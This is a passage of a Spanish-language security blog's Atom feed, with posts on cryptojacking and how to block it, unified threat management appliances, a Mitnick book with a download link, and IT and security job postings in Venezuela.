&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYtOWaVwJRLyimZAT-2a5FXmcmxgyoawufKbB8ILNp-uVUEzpRUXK7Q3prtucohOS2AlHdpqv_gOyAIU_uTGiNrlGiRLkALP-sxPuIDRojaee1HP5TRvO70EV77l9sYlubXIF34dhcJv4/s1600/criptosecuestro.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;493&quot; data-original-width=&quot;718&quot; height=&quot;438&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYtOWaVwJRLyimZAT-2a5FXmcmxgyoawufKbB8ILNp-uVUEzpRUXK7Q3prtucohOS2AlHdpqv_gOyAIU_uTGiNrlGiRLkALP-sxPuIDRojaee1HP5TRvO70EV77l9sYlubXIF34dhcJv4/s640/criptosecuestro.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
¿Qué es Criptosecuestro?&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Un minero web (webminer) es un código que se ejecuta en un sitio de Internet específico y&amp;nbsp;&lt;b&gt;Criptosecuestro&amp;nbsp;&lt;/b&gt;el poder de procesamiento del equipo de los usuarios que lo visitan para minar criptomonedas. Esto lo hace utilizando el lenguaje JavaScript en aquellos navegadores que lo tienen activado de manera predeterminada; característica que resulta común en la mayoría de los exploradores que se utilizan en la actualidad.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div&gt;
&lt;b&gt;¿Qué es no Criptosecuestro?&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
Es importante que no se confunda un minero web con la minería de criptomonedas en la nube (Cloud Mining), un servicio que ofrecen compañías o mineros con alto poder de procesamiento para alquilarlo a usuarios que pagan un contrato y obtienen una ganancia determinada por su afiliación. La diferencia entre un minero web y un servicio de minería en la nube radica en que el primero no provee de ganancias al usuario que visita la página web que lo posee y generalmente el usuario no se entera de que hay un minero alojado en su navegador. El funcionamiento de ambas modalidades para minar es completamente distinto.&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;¿Como puedo proteger mi dispositivo?&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;text-align: justify;&quot;&gt;Es posible que se piense que con tan sólo cerrar el explorador web puede acabar con el secuestro del equipo. No obstante, es preciso señalar que en el mes de diciembre fue descubierto un minero que podía seguir ejecutándose &lt;/span&gt;aún con el navegador cerrado&lt;span style=&quot;text-align: justify;&quot;&gt;, por medio de una ventana oculta en el escritorio justo debajo de la barra de tareas.&lt;/span&gt;&lt;/div&gt;
&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
Afortunadamente, hay múltiples formas de evitar que nuestros equipos sean utilizados con estos fines. En primer lugar, es muy importante mantener todos los navegadores actualizados, ya que algunos, como Opera, han integrado extensiones que bloquean la presencia de los mineros web en los equipos, incluyendo los dispositivos móviles.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Los antivirus que integran herramientas anti-malware y anti-spyware son muy útiles en el reforzamiento de la seguridad del equipo y algunos de ellos se consiguen de manera gratuita. Con la popularización de los mineros web, surgieron múltiples extensiones de navegador que detectan y bloquean la utilización de los mineros: una de las más populares es conocida como &lt;a href=&quot;https://www.criptonoticias.com/seguridad/extension-evita-mineria-web-dispositico-esta-disponible-opera/&quot;&gt;No Coin&lt;/a&gt;. También puedes utilizar bloqueadores de anuncios como &lt;a href=&quot;https://chrome.google.com/webstore/detail/adblock/gighmmpiobklfepjocnamgkkbiglidom?hl=es-419&quot;&gt;AdBlock&lt;/a&gt;, que evitan la reproducción del malvertising.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Puedes optar, de igual forma, por utilizar la exploración manual de los sitios para ver si se encuentran minando criptomonedas o no, con la utilidad “&lt;a href=&quot;http://whoismining.com/&quot;&gt;¿quién está minando?&lt;/a&gt;”, donde podrás ingresar manualmente la dirección de un sitio web específico para saber si tiene un código de minería incrustado. Si no deseas hacerlo manualmente, también cuentas con un &lt;a href=&quot;http://cryptojackingtest.com/&quot;&gt;test&lt;/a&gt; que te permite saber si una de las páginas que estás visitando tiene algún minero web activado.&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/2480147007869722975/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2018/07/criptosecuestro-que-es-y-que-no-es-como.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/2480147007869722975'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/2480147007869722975'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2018/07/criptosecuestro-que-es-y-que-no-es-como.html' title='Criptosecuestro  ¿Qué es? y ¿Qué no es? ¿Cómo puedo protegerme?'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYtOWaVwJRLyimZAT-2a5FXmcmxgyoawufKbB8ILNp-uVUEzpRUXK7Q3prtucohOS2AlHdpqv_gOyAIU_uTGiNrlGiRLkALP-sxPuIDRojaee1HP5TRvO70EV77l9sYlubXIF34dhcJv4/s72-c/criptosecuestro.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-4691253429611409794</id><published>2018-07-29T15:44:00.000-04:00</published><updated>2018-07-29T15:44:34.145-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Amenazas"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberdelincuencia"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Herramientas"/><category scheme="http://www.blogger.com/atom/ns#" term="UTM"/><title type='text'>¿Qué es la gestión unificada de amenazas (UTM)?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinOcCzE9Muy0Kn5fy0hcNUZ65Ly18oJj1HLNlz5LYUYjL1P780g9AWL03w8oWmkCyuqLDj_gPKR6wT8fJ56_IrhCCwjdUoG-pzbuKQMG_YO2Hy3-3x08Mabv6OrVKACmRjdJD1KDyEEGQ/s1600/UTM-firewall.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;381&quot; data-original-width=&quot;562&quot; height=&quot;216&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinOcCzE9Muy0Kn5fy0hcNUZ65Ly18oJj1HLNlz5LYUYjL1P780g9AWL03w8oWmkCyuqLDj_gPKR6wT8fJ56_IrhCCwjdUoG-pzbuKQMG_YO2Hy3-3x08Mabv6OrVKACmRjdJD1KDyEEGQ/s320/UTM-firewall.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
La gestión unificada de amenazas, que comúnmente se abrevia como UTM (Unified Threat Management), se refiere un único producto de seguridad que ofrece varias funciones de protección en un solo punto en la red, en el mercado actual este tipo dispositivo&amp;nbsp; esta enfocado a la pequeña y mediana empresa, se encuentran distribuidas en múltiples sedes.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Un producto UTM generalmente incluye funciones como antivirus, antispyware, antispam, firewall de red, prevención y detección de intrusiones, filtrado de contenido y prevención de fugas. Algunas unidades también ofrecen servicios como enrutamiento remoto, traducción de direcciones de red (NAT, network address translation) y compatibilidad para redes privadas virtuales (VPN, virtual private network).&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Ventajas UTM&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Ofrece una solución de seguridad sencillez.&lt;/b&gt; Las empresas que utilizan servicios de proveedores o productos diferentes para cada tarea de seguridad ahora pueden reunirlos todos en una sola solución, con asistencia de un único equipo o segmento de TI, y ejecutarlos desde una sola consola.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Facilitar en gran medida la tarea de abordar diversas amenazas: &lt;/b&gt;Existen&amp;nbsp;amenazas mixtas, que son el resultado de la combinación de varios tipos de malware y ataques dirigidos a partes diferentes de la red de forma simultánea, evitar este tipo de ataques puede resultar difícil cuando se utilizan distintos productos y proveedores para cada tarea de seguridad específica, ya que cada aspecto tiene que administrarse y actualizarse de forma individual para poder hacer frente a las últimas formas de malware y cibercrimen. La creación de un único punto de defensa y el uso de una sola consola permiten a las soluciones UTM facilitar en gran medida la tarea de abordar diversas amenazas.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Desventaja&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;Un único punto de defensa que proporciona un dispositivo UTM también constituye un único punto de falla. Por este motivo, muchas organizaciones optan por complementar su dispositivo UTM con un segundo perímetro basado en software para detener cualquier malware que logre superar el firewall UTM.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/4691253429611409794/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2018/07/que-es-la-gestion-unificada-de-amenazas.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/4691253429611409794'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/4691253429611409794'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2018/07/que-es-la-gestion-unificada-de-amenazas.html' title='¿Qué es la gestión unificada de amenazas (UTM)?'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinOcCzE9Muy0Kn5fy0hcNUZ65Ly18oJj1HLNlz5LYUYjL1P780g9AWL03w8oWmkCyuqLDj_gPKR6wT8fJ56_IrhCCwjdUoG-pzbuKQMG_YO2Hy3-3x08Mabv6OrVKACmRjdJD1KDyEEGQ/s72-c/UTM-firewall.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-4045417153977119259</id><published>2018-01-12T09:13:00.001-04:00</published><updated>2018-01-12T09:14:08.004-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Amenazas"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberdelincuencia"/><category scheme="http://www.blogger.com/atom/ns#" term="Cibersabotaje"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberterrorismo"/><category scheme="http://www.blogger.com/atom/ns#" term="Informática Forense"/><category scheme="http://www.blogger.com/atom/ns#" term="Ingeniería Social"/><title type='text'>EL ARTE DE LA INTRUSION – COMO SER UN HACKER O EVITARLOS (edición en español).</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgySXQ1B71RHuM0J0CZj-fHc1RoN-ZdrJ9Frri6AXcguZPjKI_zi9bXpgfp9YABngJNa3aJ6eCzgIHQteyOf_nZob9aBa8SiPNG8tl2qW-X5s4CqBvcs-1CmlFuO_VWHDGc1HefKJv8hHg/s1600/INTRUSION.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;211&quot; data-original-width=&quot;500&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgySXQ1B71RHuM0J0CZj-fHc1RoN-ZdrJ9Frri6AXcguZPjKI_zi9bXpgfp9YABngJNa3aJ6eCzgIHQteyOf_nZob9aBa8SiPNG8tl2qW-X5s4CqBvcs-1CmlFuO_VWHDGc1HefKJv8hHg/s1600/INTRUSION.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Autores: Kevin Mitnick y William Simon&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;KEVIN D. MITNICK es un célebre hacker que ha “enderezado su camino” y ahora consagra sus considerables habilidades a ayudar a empresas, organizaciones y organismos gubernamentales a protegerse de los tipos de ataques descritos en este libro y en su anterior bestseller, The Art of Deception (traducido al español como El Arte del Engaño).&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;https://www.google.com/search?q=El+Arte+de+la+Intrusi%C3%B3n+Mitnick&quot;&gt;El Arte de la Intrusión&lt;/a&gt; ha sido incluso más difícil de escribir que nuestro último libro &lt;a href=&quot;https://www.google.com/search?q=El+Arte+del+Enga%C3%B1o+Mitnick&quot;&gt;El Arte del Engaño&lt;/a&gt;. En lugar de utilizar nuestros talentos creativos combinados para desarrollar historias y anécdotas que ilustren los peligros de la ingeniería social y qué pueden hacer las empresas para mitigar los riesgos, Bill Simón y yo hemos trabajado principalmente sobre las entrevistas de ex hackers, phreakers y hackers convertidos a profesionales de la seguridad.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Queríamos escribir un libro que fuera a un mismo tiempo una novela de misterio y un manual que abra los ojos a las empresas y les ayude a proteger su información confidencial y sus recursos informáticos. Creemos firmemente que sacando a la luz las metodologías y las técnicas más comunes que utilizan los hackers para penetrar en sistemas y redes, podemos ejercer influencia en todo el ámbito para abordar correctamente los riesgos y las amenazas que suponen estos adversarios audaces.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Indice del contenido:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Intrusión en los casinos por un millón de dólares - Cuando los terroristas entran por la puerta - Los hackers de la prisión de Texas - Policías y ladrones - El Robin Hood hacker - La sabiduría y la locura de las auditorías de seguridad - Su banco es seguro, ¿no? - Su propiedad intelectual no está segura - En el continente - Ingenieros sociales: cómo trabajan y cómo detenerlos - Anécdotas breves.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;https://radiosyculturalibre.com.ar/biblioteca/INFOSEC/Mitnick%20Kevin%20-%20El%20Arte%20De%20La%20Intrusion.PDF&quot;&gt;Dascargar&lt;/a&gt; (2.2 MB)&lt;/div&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img border=&quot;0&quot; src=&quot;https://mail.google.com/mail/u/0/?ui=2&amp;amp;ik=9404b56151&amp;amp;view=fimg&amp;amp;th=160e665ed90d9bd2&amp;amp;attid=0.1&amp;amp;disp=emb&amp;amp;attbid=ANGjdJ-XgRZAKoefEU4aqzlLd7K7xRw-auX5bAWXQFHHNGC-iKgOzMIwKRUF2AyFqlWmHmePPofmOBOAsZ0egCmIp6I4H-Z0Lq5ffDJWOZ1a72QiLDrQlC8fEhWav70&amp;amp;sz=w792-h1028&amp;amp;ats=1515762085058&amp;amp;rm=160e665ed90d9bd2&amp;amp;zw&amp;amp;atsh=1&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; font-family: &amp;quot;Times New Roman&amp;quot;, serif; font-size: 12pt; margin-left: 0cm; margin-right: 0cm;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/4045417153977119259/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2018/01/el-arte-de-la-intrusion-como-ser-un.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/4045417153977119259'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/4045417153977119259'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2018/01/el-arte-de-la-intrusion-como-ser-un.html' title='EL ARTE DE LA INTRUSION – COMO SER UN HACKER O EVITARLOS (edición en español).'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgySXQ1B71RHuM0J0CZj-fHc1RoN-ZdrJ9Frri6AXcguZPjKI_zi9bXpgfp9YABngJNa3aJ6eCzgIHQteyOf_nZob9aBa8SiPNG8tl2qW-X5s4CqBvcs-1CmlFuO_VWHDGc1HefKJv8hHg/s72-c/INTRUSION.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-690648368534807807</id><published>2018-01-12T08:50:00.001-04:00</published><updated>2018-01-12T08:50:57.532-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Empleo"/><title type='text'>Profesional para el área de Infraestructura (soporte Aplicaciones) en Consorcio Credicard.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfIw2PLdEB2CfNOUFw-qjSOthmQNKroRjjh6KUGMmVJbDL3YhlhLtCBSLpgYvr6YDAHlG1pZBiarvjQBwJcwFGOSK08ppqV1A_KiAgMK9n4Uwz_KNfM-PorJHuPS6uqwzn3p2vV9hj0iM/s1600/ofertas-de-empleo.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;350&quot; data-original-width=&quot;712&quot; height=&quot;314&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfIw2PLdEB2CfNOUFw-qjSOthmQNKroRjjh6KUGMmVJbDL3YhlhLtCBSLpgYvr6YDAHlG1pZBiarvjQBwJcwFGOSK08ppqV1A_KiAgMK9n4Uwz_KNfM-PorJHuPS6uqwzn3p2vV9hj0iM/s640/ofertas-de-empleo.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;1. EDUCACIÓN:&lt;br /&gt;&lt;br /&gt;Licenciado/Ingeniero en computación, sistemas o carrera afín.&lt;br /&gt;&lt;br /&gt;2. CONOCIMIENTOS&lt;br /&gt;Habilidades en implantación y administración de servidores de aplicación (JBoss, Tomcat y WAS),&lt;br /&gt;Servidores Web (Apache, IIS, GlasFish).&lt;br /&gt;Conocimiento de sistemas operativos Unix, linux y Windows.&lt;br /&gt;Deseable experiencia en implementación y administración de servidores de correo.&lt;br /&gt;&lt;br /&gt; 3. ACTITUDES Y VALORES:&lt;br /&gt;&lt;br /&gt;·         Actitudes: Proactivo, innovador, foco en el cliente, liderazgo, sentido de pertenencia.&lt;br /&gt;&lt;br /&gt;·         Valores: Seguridad, responsabilidad, disciplina, digno de confianza&lt;br /&gt;&lt;br /&gt;Si quiere postularse, puede remitir su CV a la dirección de correo &lt;a href=&quot;mailto:ruben.sojo@credicard.com.ve&quot;&gt;ruben.sojo@credicard.com.ve&lt;/a&gt; y &lt;a href=&quot;mailto:gilbey.serrano@credicard.com.ve&quot;&gt;gilbey.serrano@credicard.com.ve&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/690648368534807807/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2018/01/profesional-para-el-area-de.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/690648368534807807'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/690648368534807807'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2018/01/profesional-para-el-area-de.html' title='Profesional para el área de Infraestructura (soporte Aplicaciones) en Consorcio Credicard.'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfIw2PLdEB2CfNOUFw-qjSOthmQNKroRjjh6KUGMmVJbDL3YhlhLtCBSLpgYvr6YDAHlG1pZBiarvjQBwJcwFGOSK08ppqV1A_KiAgMK9n4Uwz_KNfM-PorJHuPS6uqwzn3p2vV9hj0iM/s72-c/ofertas-de-empleo.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-5514254647123055407</id><published>2017-08-24T10:00:00.001-04:00</published><updated>2017-08-24T10:01:34.691-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Empleo"/><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad de Información"/><title type='text'>Oferta de Trabajo- Seguridad Informática- ESET Venezuela</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxs89AGwJhF_MruO5oI2yI6oESnUQVn6g-d36o5jJcdpr1MIDt1HQRTqk_LCNJ1ZM9IqEkcOsEUff4V1ccBF36WSSmru-JsloW-Tz9ElfEMGU8VXq2NvtQKjtj2tJEPNs40JiRPSCxZgk/s1600/ESET+de+Venezuela.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;128&quot; data-original-width=&quot;404&quot; height=&quot;202&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxs89AGwJhF_MruO5oI2yI6oESnUQVn6g-d36o5jJcdpr1MIDt1HQRTqk_LCNJ1ZM9IqEkcOsEUff4V1ccBF36WSSmru-JsloW-Tz9ElfEMGU8VXq2NvtQKjtj2tJEPNs40JiRPSCxZgk/s640/ESET+de+Venezuela.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;ESET de Venezuela, empresa en el área de Seguridad de la Información está en la búsqueda de personal para los siguientes 2 cargos disponibles:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;1.- Gerente Comercial-Channel manager&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;·         Descripción del empleo:&lt;br /&gt;&lt;br /&gt;·         El Gerente Comercial es el principal punto de contacto entre ESET y la red de canales de soporte y comercialización de sus productos. Este rol requiere de un individuo proactivo, dinámico, que sea capaz de manejar un gran número de actividades en simultáneo.&lt;br /&gt;&lt;br /&gt;·         Experiencia y aptitudes deseadas&lt;br /&gt;&lt;br /&gt;REQUISITOS:&lt;br /&gt;Residenciado en Caracas&lt;br /&gt;Vehículo propio ( preferiblemente)&lt;br /&gt;&lt;br /&gt;·         * Individuo con perfil multifuncional con habilidades técnicas, comerciales y de marketing&lt;br /&gt;* Título de grado en Negocios y/o Marketing, o título de grado en Sistemas de la Información, o experiencia equivalente en posicionales similares&lt;br /&gt;* Habilidades interpersonales altamente desarrolladas tanto personalmente, telefónicamente como por medios de comunicación digitales como el correo electrónico&lt;br /&gt;* Habilidades para el trabajo en equipo en ventas y proyectos, manejo del tiempo y organización&lt;br /&gt;* Habilidades para cerrar negocios alcanzando al mismo tiempo un alto nivel de satisfacción del cliente&lt;br /&gt;* Conocer y comprender las tendencias en seguridad de la información y otros temas técnicos relacionados&lt;br /&gt;* Actitud profesional y cortes, respetuosa, para reflejar el compromiso de ESET con la calidad de sus productos y la relación con sus canales&lt;br /&gt;* Creatividad comercial, seguimiento y creación de políticas comerciales, y capacidad para manejar todo el ciclo de ventas&lt;br /&gt;* Background técnico en sistemas operativos, redes informáticas y seguridad de la información&lt;br /&gt;* Idiomas: Español e Inglés ( preferiblemente).&lt;br /&gt;&lt;br /&gt;Principales responsabilidades:&lt;br /&gt;&lt;br /&gt;·        Trabajar en forma cercana a los canales para crear y cerrar negocios.&lt;br /&gt;&lt;br /&gt;·         Reclutar nuevos canales.&lt;br /&gt;&lt;br /&gt;·        Proveer asistencia y cerrar negocios.&lt;br /&gt;&lt;br /&gt;·         Calificar prospectos y coordinar el acercamiento a los mismos con los canales.&lt;br /&gt;&lt;br /&gt;·        Brindar presentaciones comerciales y/o técnicas en demostraciones con clientes, eventos y/o conferencias.&lt;br /&gt;&lt;br /&gt;·        Gestionar la relación comercial con clientes de las cuentas claves, lo cual implica ser interlocutor entre la compañía y el cliente a fin de establecer acuerdos en respuesta a los planteamientos, necesidades o posicionamientos en el cliente.&lt;br /&gt;&lt;br /&gt;·        Diseñar soluciones eficientes para satisfacer las 